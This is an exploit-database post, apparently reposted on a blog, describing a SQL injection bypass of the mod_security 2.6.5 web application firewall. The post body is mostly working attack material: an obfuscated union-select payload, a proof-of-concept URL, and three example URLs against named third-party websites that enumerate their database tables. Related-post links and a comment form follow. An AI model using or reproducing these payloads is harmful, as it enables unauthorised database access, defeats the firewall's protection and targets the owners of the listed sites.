# Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22]
Related Posts
Exclusive Updates from 'The Hacker News'20 Jan 20141p {margin:0;} .desc img {width:auto;height:auto;max-width:175px;float:right;padding:0 0 0 10px;} ...Read more »
Opencart Multiple Vulnerabilities06 Dec 20131########################################################################### # Title: Opencart Multip...Read more »
- [slackware-security] hplip (SSA:2013-339-04)05 Dec 20130
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] hplip (SSA:2013-339-04) New hp...Read more »
- [slackware-security] seamonkey (SSA:2013-339-03)05 Dec 20130
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] seamonkey (SSA:2013-339-03) Ne...Read more »
- [slackware-security] mozilla-thunderbird (SSA:2013-339-02)05 Dec 20130
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2013-3...Read more »
Subscribe to:
Post Comments (Atom)
0 komentar:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.